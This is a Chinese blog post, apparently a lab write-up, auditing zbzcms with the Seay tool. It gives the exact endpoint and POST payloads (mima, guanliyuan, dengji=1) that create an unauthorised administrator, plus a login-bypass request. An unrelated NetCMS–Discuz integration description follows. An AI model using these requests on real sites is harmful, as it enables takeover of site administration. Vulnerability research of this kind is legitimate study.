zbzcms代码审计实验2

前台未授权添加管理员

一、用seay代码审计系统,自动审计代码,发现可疑代码

在这里插入图片描述

二、查看代码,并分析看看

在这里插入图片描述

发现可疑参数mima和guanliyuan,即密码和管理员,
构造URL

/cms/cms/admin/run_ajax.php?run=admin

构造payload

mima=haha123&guanliyuan=haha

三、使用hackbar插件执行payload

发现返回一个值为5
在这里插入图片描述
尝试用构造的管理员用户和密码登录看看
在这里插入图片描述
发现权限不足无法登录,这里有两种方法解决

第一种

在这里插入图片描述
payload参数加入&dengji=1

mima=haha123&guanliyuan=haha&dengji=1

成功获取权限在这里插入图片描述

第二种

分析代码,分析可以通过其他参数绕过
在这里插入图片描述
构造payload

/cms/cms/admin/run_ajax.php?run=login
guanliyuan=haha$pwd=haha123

执行看看
在这里插入图片描述
刷新发现成功进入后台
在这里插入图片描述

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内容发布系统NetCMS与Discuz论坛整合源码 本代码将NetCMS与Discuz!NT3.1进行注册、登录、退出等功能的整合,整合过程如下: 整合环境: 1、NetCMS和Disicuz的架设请参考相关的文档说明,但要注意不要用XP的IIS5.0进行测试,直接用服务器的IIS测试; 2、在VS下直接调试运行NetCMS的登录(user/Logout.aspx)时会出错,最好直接在架设好的环境下测试。 论坛设置: 1、架设好Discuz论坛,打开Discuz论坛系统后台->扩展->通行证设置,通行证的返回地址设置为NetCMS的回调页面地址(此回调页面用于处理CMS的登录退出等功能),如:http://http://netcms.com/api/discuz/apicallback.aspx,此回调页面在源代码的api/discuz/apicallback.aspx下,开发人员可根据需求在这个页面里进行其他的功能处理; 2、打开Discuz论坛系统后台->常规选项->基本设置,找到"身份验证Cookie域"选项,在此填入NetCMS系统的域,如: .netcms.com,注意这项一定要和NetCMS设置里第1条web.config里设置的DNTCookieDomain值一样。 NetCMS设置: 1、在web.config里将<appSettings>配置节里的DNTCookieDomain设置为论坛域,DNTAPIKey,DNTSecert,DNTWebServer修改为在论坛后台扩展设置里获取到的相应值。 2、架设NetCMS,整合就完成了。 整合代码修改说明: 1、引用了DiscuzToolkit插件,用于discuz论坛api接口调用; 2、在API/Discuz目录下添加apicallback.aspx程序页,用于处理论坛回调请求处理; 3、在API/Discuz目录下添加DiscuzSessionHelper.cs,用于实例化论坛API接口; 4、在user/Login.aspx.cs、user/Logout.aspx.cs、user/Register.aspx.cs、user/UserLoginajax.aspx.cs里添加了相应的整合代码; 5、修改了NetCMS源码版本安装初始化数据,首页不能登录和退出等几个bug。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值